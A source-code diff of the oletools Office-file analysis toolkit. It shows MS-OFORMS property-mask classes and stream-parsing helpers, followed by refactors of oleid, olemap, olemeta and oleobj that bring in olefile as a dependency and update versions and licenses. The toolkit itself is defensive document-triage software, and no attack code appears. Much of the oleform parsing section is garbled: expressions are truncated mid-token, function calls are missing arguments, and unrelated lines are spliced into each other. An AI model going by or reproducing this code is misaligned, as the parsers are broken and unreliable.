+ self._val = [(val & (1<>i for i in range(self._size)]
+
+ def __str__(self):
+ return ', '.join(self._names[i] for i in range(self._size) if self._val[i])
+
+ def __getattr__(self, name):
+ return self._val[self._names.index(name)]
+
+ def __len__(self):
+ return self.size
+
+ def __getitem__(self, key):
+ return self._val[self._names.index(key)]
+
+ def consume(self, stream, props):
+ for (name, size) in props:
+ if self[name]:
+ stream.read(size)
+
+class FormPropMask(Mask):
+ """FormPropMask: [MS-OFORMS] 2.2.10.2"""
+ _size = 28
+ _names = ['Unused1', 'fBackColor', 'fForeColor', 'fNextAvailableID', 'Unused2_0', 'Unused2_1',
+ 'fBooleanProperties', 'fBooleanProperties', 'fMousePointer', 'fScrollBars',
+ 'fDisplayedSize', 'fLogicalSize', 'fScrollPosition', 'fGroupCnt', 'Reserved',
+ 'fMouseIcon', 'fCycle', 'fSpecialEffect', 'fBorderColor', 'fCaption', 'fFont',
+ 'fPicture', 'fZoom', 'fPictureAlignment', 'fPictureTiling', 'fPictureSizeMode',
+ 'fShapeCookie', 'fDrawBuffer']
+
+class SitePropMask(Mask):
+ """SitePropMask: [MS-OFORMS] 2.2.10.12.2"""
+ _size = 15
+ _names = ['fName', 'fTag', 'fID', 'fHelpContextID', 'fBitFlags', 'fObjectStreamSize',
+ 'fTabIndex', 'fClsidCacheIndex', 'fPosition', 'fGroupID', 'Unused1',
+ 'fControlTipText', 'fRuntimeLicKey', 'fControlSource', 'fRowSource']
+
+class MorphDataPropMask(Mask):
+ """MorphDataPropMask: [MS-OFORMS] 2.2.5.2"""
+ _size = 33
+ _names = ['fVariousPropertyBits', 'fBackColor', 'fForeColor', 'fMaxLength', 'fBorderStyle',
+ 'fScrollBars', 'fDisplayStyle', 'fMousePointer', 'fSize', 'fPasswordChar',
+ 'fListWidth', 'fBoundColumn', 'fTextColumn', 'fColumnCount', 'fListRows',
+ 'fcColumnInfo', 'fMatchEntry', 'fListStyle', 'fShowDropButtonWhen', 'UnusedBits1',
+ 'fDropButtonStyle', 'fMultiSelect', 'fValue', 'fCaption', 'fPicturePosition',
+ 'fBorderColor', 'fSpecialEffect', 'fMouseIcon', 'fPicture', 'fAccelerator',
+ 'UnusedBits2', 'Reserved', 'fGroupName']
+
+class ImagePropMask(Mask):
+ """ImagePropMask: [MS-OFORMS] 2.2.3.2"""
+ _size = 15
+ _names = ['UnusedBits1_1', 'UnusedBits1_2', 'fAutoSize', 'fBorderColor', 'fBackColor',
+ 'fBorderStyle', 'fMousePointer', 'fPictureSizeMode', 'fSpecialEffect', 'fSize',
+ 'fPicture', 'fPictureAlignment', 'fPictureTiling', 'fVariousPropertyBits',
+ 'fMouseIcon']
+
+class CommandButtonPropMask(Mask):
+ """CommandButtonPropMask: [MS-OFORMS] 2.2.1.2"""
+ _size = 11
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fCaption', 'fPicturePosition',
+ 'fSize', 'fMousePointer', 'fPicture', 'fAccelerator', 'fTakeFocusOnClick',
+ 'fMouseIcon']
+
+class SpinButtonPropMask(Mask):
+ """SpinButtonPropMask: [MS-OFORMS] 2.2.8.2"""
+ _size = 15
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fSize', 'UnusedBits1',
+ 'fMin', 'fMax', 'fPosition', 'fPrevEnabled', 'fNextEnabled', 'fSmallChange',
+ 'fOrientation', 'fDelay', 'fMouseIcon', 'fMousePointer']
+
+class TabStripPropMask(Mask):
+ """TabStripPropMask: [MS-OFORMS] 2.2.9.2"""
+ _size = 25
+ _names = ['fListIndex', 'fBackColor', 'fForeColor', 'Unused1', 'fSize', 'fItems',
+ 'fMousePointer', 'Unused2', 'fTabOrientation', 'fTabStyle', 'fMultiRow',
+ 'fTabFixedWidth', 'fTabFixedHeight', 'fTooltips', 'Unused3', 'fTipStrings',
+ 'Unused4', 'fNames', 'fVariousPropertyBits', 'fNewVersion', 'fTabsAllocated',
+ 'fTags', 'fTabData', 'fAccelerator', 'fMouseIcon']
+
+class LabelPropMask(Mask):
+ """LabelPropMask: [MS-OFORMS] 2.2.4.2"""
+ _size = 13
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fCaption',
+ 'fPicturePosition', 'fSize', 'fMousePointer', 'fBorderColor', 'fBorderStyle',
+ 'fSpecialEffect', 'fPicture', 'fAccelerator', 'fMouseIcon']
+
+class ScrollBarPropMask(Mask):
+ """ScrollBarPropMask: [MS-OFORMS] 2.2.7.2"""
+ _size = 17
+ _names = ['fForeColor', 'fBackColor', 'fVariousPropertyBits', 'fSize', 'fMousePointer',
+ 'fMin', 'fMax', 'fPosition', 'UnusedBits1', 'fPrevEnabled', 'fNextEnabled',
+ 'fSmallChange', 'fLargeChange', 'fOrientation', 'fProportionalThumb',
+ 'fDelay', 'fMouseIcon']
+
+class ExtendedStream(object):
+ def __init__(self, stream, path):
+ self._pos = 0
+ self._jumps = []
+ self._stream = stream
+ self._path = path
+ self._padding = False
+ self._pad_start = 0
+
+ @classmethod
+ def open(cls, ole_file, path):
+ stream = ole_file.openstream(path)
+ return cls(stream, path)
+
+ def _read(self, size):
+ self._pos += size
+ return self._stream.read(size)
+
+ def _pad(self, start, size=4):
+ offset = (self._pos - start) % size
+ if offset:
+ self._read(size - offset)
+
+ def read(self, size):
+ if self._padding:
+ self._pad(self._pad_start, size)
+ return self._read(size)
+
+ def will_jump_to(self, size):
+ self._next_jump = ('jump', (self._pos, size))
+ return self
+
+ def will_pad(self):
+ self._next_jump = ('pad', self._pos)
+ return self
+
+ def padded_struct(self):
+ self._next_jump = ('padded', (self._padding, self._pad_start))
+ self._padding = True
+ self._pad_start = self._pos
+ return self
+
+ def __enter__(self):
+ assert(self._next_jump)
+ self._jumps.append(self._next_jump)
+ self._next_jump = None
+
+ def __exit__(self, exc_type, exc_value, traceback):
+ if exc_type is None:
+ (jump_type, data) = self._jumps.pop()
+ if jump_type == 'jump':
+ (start, size) = data
+ consummed = self._pos - start
+ if consummed > size:
+ self.raise_error('Bad jump: too much read ({0} > {1})'.format(consummed, size))
+ self.read(size - consummed)
+ elif jump_type == 'pad':
+ self._pad(data)
+ elif jump_type == 'padded':
+ (prev_padding, prev_pad_start) = data
+ self._pad(self._pad_start)
+ self._padding = prev_padding
+ self._pad_start = prev_pad_start
+
+ def unpacks(self, format, size):
+ return struct.unpack(format, self.read(size))
+
+ def unpack(self, format, size):
+ return self.unpacks(format, size)[0]
+
+ def raise_error(self, reason, back=0):
+ raise OleFormParsingError('{0}:{1}: {2}'.format(self._path, self._pos - back, reason))
+
+ def check_values(self, name, format, size, expected):
+ value = self.unpacks(format, size)
+ if value != expected:
+ self.raise_error('Invalid {0}: expected {1} got {2}'.format(name, str(expected), str(value)))
+
+ def check_value(self, name, format, size, expected):
+ self.check_values(name, format, size, (expected,))
+
+
+def consume_TextProps(stream):
+ # TextProps: [MS-OFORMS] 2.3.1
+ stream.check_values('TextProps (versions)', 'Q', 8)
+ if UUIDS == (199447043, 36753, 4558, 11376937813817407569):
+ # UUID == {0BE35203-8F91-11CE-9DE300AA004BB851}
+ # StdFont: [MS-OFORMS] 2.4.12
+ stream.check_value('StdFont (version)', 'Q', 8, 11376937813817407569)
+ # StdPicture: [MS-OFORMS] 2.4.13
+ stream.check_value('StdPicture (Preamble)', ' 0):
+ name = stream.read(name_len)
+ # Consume 2 null bytes between name and tag.
+ #if ((tag_len > 0) or (control_tip_text_len > 0)):
+ # stream.read(2)
+ # # Sometimes it looks like 2 extra null bytes go here whether or not there is a tag.
+ tag = None
+ if (tag_len > 0):
+ tag = stream.read(tag_len)
+ # Skip SitePosition.
+ if propmask.fPosition:
+ stream.read(8)
+ control_tip_text = stream.read(control_tip_text_len)
+ if (len(control_tip_text) == 0):
+ control_tip_text = None
+ return {'name': name, 'tag': tag, 'id': id, 'tabindex': tabindex,
+ 'ClsidCacheIndex': ClsidCacheIndex, 'value': None, 'caption': None,
+ 'control_tip_text':control_tip_text}
+
+def consume_FormControl(stream):
+ # FormControl: [MS-OFORMS] 2.2.10.1
+ stream.check_values('FormControl (versions)', '> 15
+ else:
+ FORM_FLAG_DONTSAVECLASSTABLE = 0
+ # Skip the rest of DataBlock and ExtraDataBlock
+ # FormStreamData: [MS-OFORMS] 2.2.10.5
+ if propmask.fMouseIcon:
+ consume_GuidAndPicture(stream)
+ if propmask.fFont:
+ consume_GuidAndFont(stream)
+ if propmask.fPicture:
+ consume_GuidAndPicture(stream)
+ # FormSiteData: [MS-OFORMS] 2.2.10.6
+ if not FORM_FLAG_DONTSAVECLASSTABLE:
+ CountOfSiteClassInfo = stream.unpack(' 0:
+ remaining_SiteDepthsAndTypes -= consume_FormObjectDepthTypeCount(stream)
+ for i in range(CountOfSites):
+ yield consume_OleSiteConcreteControl(stream)
+
+def consume_MorphDataControl(stream):
+ # MorphDataControl: [MS-OFORMS] 2.2.5.1
+ stream.check_values('MorphDataControl (versions)', ' 0):
+ caption = stream.read(caption_size)
+ # Read groupname text.
+ group_name = ""
+ if (group_name_size > 0):
+ group_name = stream.read(group_name_size)
+
+ # MorphDataStreamData: [MS-OFORMS] 2.2.5.5
+ if propmask.fMouseIcon:
+ consume_GuidAndPicture(stream)
+ if propmask.fPicture:
+ consume_GuidAndPicture(stream)
+ consume_TextProps(stream)
+ return (value, caption, group_name)
+
+def consume_ImageControl(stream):
+ # ImageControl: [MS-OFORMS] 2.2.3.1
+ stream.check_values('ImageControl (versions)', '
+The results is displayed as ascii table (but could be returned or printed in
+other formats like CSV, XML or JSON in future).
oleid project website: http://www.decalage.info/python/oleid
@@ -18,11 +17,11 @@
#=== LICENSE =================================================================
-# oleid is copyright (c) 2012-2017, Philippe Lagadec (http://www.decalage.info)
+# oleid is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
@@ -30,16 +29,17 @@
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
# To improve Python 2+3 compatibility:
from __future__ import print_function
@@ -54,8 +54,12 @@
# 2016-10-25 v0.50 PL: - fixed print and bytes strings for Python 3
# 2016-12-12 v0.51 PL: - fixed relative imports for Python 3 (issue #115)
# 2017-04-26 PL: - fixed absolute imports (issue #141)
+# 2017-09-01 SA: - detect OpenXML encryption
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-10-19 CH: - accept olefile as well as filename, return Indicators,
+# improve encryption detection for ppt
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
@@ -76,7 +80,10 @@
#=== IMPORTS =================================================================
-import optparse, sys, os, re, zlib, struct
+import argparse, sys, re, zlib, struct, os
+from os.path import dirname, abspath
+
+import olefile
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
@@ -87,17 +94,17 @@
# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
from oletools.thirdparty.prettytable import prettytable
+from oletools import crypto
#=== FUNCTIONS ===============================================================
-def detect_flash (data):
+def detect_flash(data):
"""
Detect Flash objects (SWF files) within a binary string of data
return a list of (start_index, length, compressed) tuples, or [] if nothing
@@ -117,7 +124,7 @@ def detect_flash (data):
# Read Header
header = data[start:start+3]
# Read Version
- ver = struct.unpack(' 20:
@@ -139,7 +146,7 @@ def detect_flash (data):
compressed_data = swf[8:]
try:
zlib.decompress(compressed_data)
- except:
+ except Exception:
continue
# else we don't check anything at this stage, we only assume it is a
# valid SWF. So there might be false positives for uncompressed SWF.
@@ -150,9 +157,15 @@ def detect_flash (data):
#=== CLASSES =================================================================
-class Indicator (object):
+class Indicator(object):
+ """
+ Piece of information of an :py:class:`OleID` object.
+
+ Contains an ID, value, type, name and description. No other functionality.
+ """
- def __init__(self, _id, value=None, _type=bool, name=None, description=None):
+ def __init__(self, _id, value=None, _type=bool, name=None,
+ description=None):
self.id = _id
self.value = value
self.type = _type
@@ -162,21 +175,55 @@ def __init__(self, _id, value=None, _type=bool, name=None, description=None):
self.description = description
-class OleID:
+class OleID(object):
+ """
+ Summary of information about an OLE file
- def __init__(self, filename):
- self.filename = filename
+ Call :py:meth:`OleID.check` to gather all info on a given file or run one
+ of the `check_` functions to just get a specific piece of info.
+ """
+
+ def __init__(self, input_file):
+ """
+ Create an OleID object
+
+ This does not run any checks yet nor open the file.
+
+ Can either give just a filename (as str), so OleID will check whether
+ that is a valid OLE file and create a :py:class:`olefile.OleFileIO`
+ object for it. Or you can give an already opened
+ :py:class:`olefile.OleFileIO` as argument to avoid re-opening (e.g. if
+ called from other oletools).
+
+ If filename is given, only :py:meth:`OleID.check` opens the file. Other
+ functions will return None
+ """
+ if isinstance(input_file, olefile.OleFileIO):
+ self.ole = input_file
+ self.filename = None
+ else:
+ self.filename = input_file
+ self.ole = None
self.indicators = []
+ self.suminfo_data = None
def check(self):
+ """
+ Open file and run all checks on it.
+
+ :returns: list of all :py:class:`Indicator`s created
+ """
# check if it is actually an OLE file:
oleformat = Indicator('ole_format', True, name='OLE format')
self.indicators.append(oleformat)
- if not olefile.isOleFile(self.filename):
+ if self.ole:
+ oleformat.value = True
+ elif not olefile.isOleFile(self.filename):
oleformat.value = False
return self.indicators
- # parse file:
- self.ole = olefile.OleFileIO(self.filename)
+ else:
+ # parse file:
+ self.ole = olefile.OleFileIO(self.filename)
# checks:
self.check_properties()
self.check_encrypted()
@@ -184,140 +231,241 @@ def check(self):
self.check_excel()
self.check_powerpoint()
self.check_visio()
- self.check_ObjectPool()
+ self.check_object_pool()
self.check_flash()
self.ole.close()
return self.indicators
- def check_properties (self):
- suminfo = Indicator('has_suminfo', False, name='Has SummaryInformation stream')
+ def check_properties(self):
+ """
+ Read summary information required for other check_* functions
+
+ :returns: 2 :py:class:`Indicator`s (for presence of summary info and
+ application name) or None if file was not opened
+ """
+ suminfo = Indicator('has_suminfo', False,
+ name='Has SummaryInformation stream')
self.indicators.append(suminfo)
- appname = Indicator('appname', 'unknown', _type=str, name='Application name')
+ appname = Indicator('appname', 'unknown', _type=str,
+ name='Application name')
self.indicators.append(appname)
- self.suminfo = {}
- # check stream SummaryInformation
+ if not self.ole:
+ return None, None
+ self.suminfo_data = {}
+ # check stream SummaryInformation (not present e.g. in encrypted ppt)
if self.ole.exists("\x05SummaryInformation"):
suminfo.value = True
- self.suminfo = self.ole.getproperties("\x05SummaryInformation")
+ self.suminfo_data = self.ole.getproperties("\x05SummaryInformation")
# check application name:
- appname.value = self.suminfo.get(0x12, 'unknown')
-
- def check_encrypted (self):
+ appname.value = self.suminfo_data.get(0x12, 'unknown')
+ return suminfo, appname
+
+ def get_indicator(self, indicator_id):
+ """Helper function: returns an indicator if present (or None)"""
+ result = [indicator for indicator in self.indicators
+ if indicator.id == indicator_id]
+ if result:
+ return result[0]
+ else:
+ return None
+
+ def check_encrypted(self):
+ """
+ Check whether this file is encrypted.
+
+ Might call check_properties.
+
+ :returns: :py:class:`Indicator` for encryption or None if file was not
+ opened
+ """
# we keep the pointer to the indicator, can be modified by other checks:
- self.encrypted = Indicator('encrypted', False, name='Encrypted')
- self.indicators.append(self.encrypted)
- # check if bit 1 of security field = 1:
- # (this field may be missing for Powerpoint2000, for example)
- if 0x13 in self.suminfo:
- if self.suminfo[0x13] & 1:
- self.encrypted.value = True
-
- def check_word (self):
- word = Indicator('word', False, name='Word Document',
- description='Contains a WordDocument stream, very likely to be a Microsoft Word Document.')
+ encrypted = Indicator('encrypted', False, name='Encrypted')
+ self.indicators.append(encrypted)
+ if not self.ole:
+ return None
+ encrypted.value = crypto.is_encrypted(self.ole)
+ return encrypted
+
+ def check_word(self):
+ """
+ Check whether this file is a word document
+
+ If this finds evidence of encryption, will correct/add encryption
+ indicator.
+
+ :returns: 2 :py:class:`Indicator`s (for word and vba_macro) or None if
+ file was not opened
+ """
+ word = Indicator(
+ 'word', False, name='Word Document',
+ description='Contains a WordDocument stream, very likely to be a '
+ 'Microsoft Word Document.')
self.indicators.append(word)
- self.macros = Indicator('vba_macros', False, name='VBA Macros')
- self.indicators.append(self.macros)
+ macros = Indicator('vba_macros', False, name='VBA Macros')
+ self.indicators.append(macros)
+ if not self.ole:
+ return None, None
if self.ole.exists('WordDocument'):
word.value = True
- # check for Word-specific encryption flag:
- s = self.ole.openstream(["WordDocument"])
- # pass header 10 bytes
- s.read(10)
- # read flag structure:
- temp16 = struct.unpack("H", s.read(2))[0]
- fEncrypted = (temp16 & 0x0100) >> 8
- if fEncrypted:
- self.encrypted.value = True
- s.close()
+
# check for VBA macros:
if self.ole.exists('Macros'):
- self.macros.value = True
+ macros.value = True
+ return word, macros
+
+ def check_excel(self):
+ """
+ Check whether this file is an excel workbook.
+
+ If this finds macros, will add/correct macro indicator.
- def check_excel (self):
- excel = Indicator('excel', False, name='Excel Workbook',
- description='Contains a Workbook or Book stream, very likely to be a Microsoft Excel Workbook.')
+ see also: :py:func:`xls_parser.is_xls`
+
+ :returns: :py:class:`Indicator` for excel or (None, None) if file was
+ not opened
+ """
+ excel = Indicator(
+ 'excel', False, name='Excel Workbook',
+ description='Contains a Workbook or Book stream, very likely to be '
+ 'a Microsoft Excel Workbook.')
self.indicators.append(excel)
+ if not self.ole:
+ return None
#self.macros = Indicator('vba_macros', False, name='VBA Macros')
#self.indicators.append(self.macros)
if self.ole.exists('Workbook') or self.ole.exists('Book'):
excel.value = True
# check for VBA macros:
if self.ole.exists('_VBA_PROJECT_CUR'):
- self.macros.value = True
-
- def check_powerpoint (self):
- ppt = Indicator('ppt', False, name='PowerPoint Presentation',
- description='Contains a PowerPoint Document stream, very likely to be a Microsoft PowerPoint Presentation.')
+ # correct macro indicator if present or add one
+ macro_ind = self.get_indicator('vba_macros')
+ if macro_ind:
+ macro_ind.value = True
+ else:
+ self.indicators.append('vba_macros', True,
+ name='VBA Macros')
+ return excel
+
+ def check_powerpoint(self):
+ """
+ Check whether this file is a powerpoint presentation
+
+ see also: :py:func:`ppt_record_parser.is_ppt`
+
+ :returns: :py:class:`Indicator` for whether this is a powerpoint
+ presentation or not or None if file was not opened
+ """
+ ppt = Indicator(
+ 'ppt', False, name='PowerPoint Presentation',
+ description='Contains a PowerPoint Document stream, very likely to '
+ 'be a Microsoft PowerPoint Presentation.')
self.indicators.append(ppt)
+ if not self.ole:
+ return None
if self.ole.exists('PowerPoint Document'):
ppt.value = True
-
- def check_visio (self):
- visio = Indicator('visio', False, name='Visio Drawing',
- description='Contains a VisioDocument stream, very likely to be a Microsoft Visio Drawing.')
+ return ppt
+
+ def check_visio(self):
+ """Check whether this file is a visio drawing"""
+ visio = Indicator(
+ 'visio', False, name='Visio Drawing',
+ description='Contains a VisioDocument stream, very likely to be a '
+ 'Microsoft Visio Drawing.')
self.indicators.append(visio)
+ if not self.ole:
+ return None
if self.ole.exists('VisioDocument'):
visio.value = True
+ return visio
+
+ def check_object_pool(self):
+ """
+ Check whether this file contains an ObjectPool stream.
+
+ Such a stream would be a strong indicator for embedded objects or files.
- def check_ObjectPool (self):
- objpool = Indicator('ObjectPool', False, name='ObjectPool',
- description='Contains an ObjectPool stream, very likely to contain embedded OLE objects or files.')
+ :returns: :py:class:`Indicator` for ObjectPool stream or None if file
+ was not opened
+ """
+ objpool = Indicator(
+ 'ObjectPool', False, name='ObjectPool',
+ description='Contains an ObjectPool stream, very likely to contain '
+ 'embedded OLE objects or files.')
self.indicators.append(objpool)
+ if not self.ole:
+ return None
if self.ole.exists('ObjectPool'):
objpool.value = True
-
-
- def check_flash (self):
- flash = Indicator('flash', 0, _type=int, name='Flash objects',
- description='Number of embedded Flash objects (SWF files) detected in OLE streams. Not 100% accurate, there may be false positives.')
+ return objpool
+
+ def check_flash(self):
+ """
+ Check whether this file contains flash objects
+
+ :returns: :py:class:`Indicator` for count of flash objects or None if
+ file was not opened
+ """
+ flash = Indicator(
+ 'flash', 0, _type=int, name='Flash objects',
+ description='Number of embedded Flash objects (SWF files) detected '
+ 'in OLE streams. Not 100% accurate, there may be false '
+ 'positives.')
self.indicators.append(flash)
+ if not self.ole:
+ return None
for stream in self.ole.listdir():
data = self.ole.openstream(stream).read()
found = detect_flash(data)
# just add to the count of Flash objects:
flash.value += len(found)
#print stream, found
+ return flash
#=== MAIN =================================================================
def main():
+ """Called when running this file as script. Shows all info on input file."""
# print banner with version
- print ('oleid %s - http://decalage.info/oletools' % __version__)
- print ('THIS IS WORK IN PROGRESS - Check updates regularly!')
- print ('Please report any issue at https://github.com/decalage2/oletools/issues')
- print ('')
+ print('oleid %s - http://decalage.info/oletools' % __version__)
+ print('THIS IS WORK IN PROGRESS - Check updates regularly!')
+ print('Please report any issue at '
+ 'https://github.com/decalage2/oletools/issues')
+ print('')
- usage = 'usage: %prog [options] '
- parser = optparse.OptionParser(usage=__doc__ + '\n' + usage)
-## parser.add_option('-o', '--ole', action='store_true', dest='ole', help='Parse an OLE file (e.g. Word, Excel) to look for SWF in each stream')
+ parser = argparse.ArgumentParser(description=__doc__)
+ parser.add_argument('input', type=str, nargs='*', metavar='FILE',
+ help='Name of files to process')
+ # parser.add_argument('-o', '--ole', action='store_true', dest='ole',
+ # help='Parse an OLE file (e.g. Word, Excel) to look for '
+ # 'SWF in each stream')
- (options, args) = parser.parse_args()
+ args = parser.parse_args()
# Print help if no argurments are passed
- if len(args) == 0:
+ if len(args.input) == 0:
parser.print_help()
return
- for filename in args:
+ for filename in args.input:
print('Filename:', filename)
oleid = OleID(filename)
indicators = oleid.check()
#TODO: add description
#TODO: highlight suspicious indicators
- t = prettytable.PrettyTable(['Indicator', 'Value'])
- t.align = 'l'
- t.max_width = 39
- #t.border = False
+ table = prettytable.PrettyTable(['Indicator', 'Value'])
+ table.align = 'l'
+ table.max_width = 39
+ table.border = False
for indicator in indicators:
#print '%s: %s' % (indicator.name, indicator.value)
- t.add_row((indicator.name, indicator.value))
+ table.add_row((indicator.name, indicator.value))
- print(t)
- print ('')
+ print(table)
+ print('')
if __name__ == '__main__':
main()
diff --git a/oletools/olemap.py b/oletools/olemap.py
index 6f8f51f1..fc6a8358 100644
--- a/oletools/olemap.py
+++ b/oletools/olemap.py
@@ -13,7 +13,7 @@
#=== LICENSE ==================================================================
-# olemap is copyright (c) 2015-2017 Philippe Lagadec (http://www.decalage.info)
+# olemap is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -51,9 +51,10 @@
# 2017-03-22 PL: - added extra data detection, completed header display
# 2017-03-23 PL: - only display the header by default
# - added option --exdata to display extra data in hex
+# 2018-08-28 v0.54 PL: - olefile is now a dependency
+# 2019-07-10 v0.55 PL: - fixed display of OLE header CLSID (issue #394)
-
-__version__ = '0.51'
+__version__ = '0.55'
#------------------------------------------------------------------------------
# TODO:
@@ -74,7 +75,7 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.olefile import olefile
+import olefile
from oletools.thirdparty.tablestream import tablestream
from oletools.thirdparty.xglob import xglob
from oletools.ezhexviewer import hexdump3
@@ -121,7 +122,7 @@ def show_header(ole, extra_data=False):
print("OLE HEADER:")
t = tablestream.TableStream([24, 16, 79-(4+24+16)], header_row=['Attribute', 'Value', 'Description'])
t.write_row(['OLE Signature (hex)', binascii.b2a_hex(ole.header_signature).upper(), 'Should be D0CF11E0A1B11AE1'])
- t.write_row(['Header CLSID (hex)', binascii.b2a_hex(ole.header_clsid).upper(), 'Should be 0'])
+ t.write_row(['Header CLSID', ole.header_clsid, 'Should be empty (0)'])
t.write_row(['Minor Version', '%04X' % ole.minor_version, 'Should be 003E'])
t.write_row(['Major Version', '%04X' % ole.dll_version, 'Should be 3 or 4'])
t.write_row(['Byte Order', '%04X' % ole.byte_order, 'Should be FFFE (little endian)'])
diff --git a/oletools/olemeta.py b/oletools/olemeta.py
index 7ae8b3e6..61317460 100644
--- a/oletools/olemeta.py
+++ b/oletools/olemeta.py
@@ -15,7 +15,7 @@
#=== LICENSE =================================================================
-# olemeta is copyright (c) 2013-2017, Philippe Lagadec (http://www.decalage.info)
+# olemeta is copyright (c) 2013-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -49,8 +49,9 @@
# 2016-10-28 PL: - removed the UTF8 codec for console display
# 2017-04-26 v0.51 PL: - fixed absolute imports (issue #141)
# 2017-05-04 PL: - added optparse and xglob (issue #141)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -75,9 +76,10 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
+import olefile
from oletools.thirdparty import xglob
from oletools.thirdparty.tablestream import tablestream
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
#=== MAIN =================================================================
@@ -87,13 +89,12 @@ def process_ole(ole):
meta = ole.get_metadata()
# console output with UTF8 encoding:
- # It looks like we do not need the UTF8 codec anymore, both for Python 2 and 3
- console_utf8 = sys.stdout #codecs.getwriter('utf8')(sys.stdout)
+ ensure_stdout_handles_unicode()
# TODO: move similar code to a function
print('Properties from the SummaryInformation stream:')
- t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'], outfile=console_utf8)
+ t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'])
for prop in meta.SUMMARY_ATTRIBS:
value = getattr(meta, prop)
if value is not None:
@@ -110,7 +111,7 @@ def process_ole(ole):
print('')
print('Properties from the DocumentSummaryInformation stream:')
- t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'], outfile=console_utf8)
+ t = tablestream.TableStream([21, 30], header_row=['Property', 'Value'])
for prop in meta.DOCSUM_ATTRIBS:
value = getattr(meta, prop)
if value is not None:
diff --git a/oletools/oleobj.py b/oletools/oleobj.py
index 1b54ccb5..8ed34f2d 100644
--- a/oletools/oleobj.py
+++ b/oletools/oleobj.py
@@ -1,10 +1,9 @@
#!/usr/bin/env python
-from __future__ import print_function
"""
oleobj.py
oleobj is a Python script and module to parse OLE objects and files stored
-into various file formats such as RTF or MS Office documents (e.g. Word, Excel).
+into various MS Office file formats (doc, xls, ppt, docx, xlsx, pptx, etc)
Author: Philippe Lagadec - http://www.decalage.info
License: BSD, see source code or documentation
@@ -13,33 +12,67 @@
http://www.decalage.info/python/oletools
"""
-# === LICENSE ==================================================================
+# === LICENSE =================================================================
-# oleobj is copyright (c) 2015-2017 Philippe Lagadec (http://www.decalage.info)
+# oleobj is copyright (c) 2015-2020 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
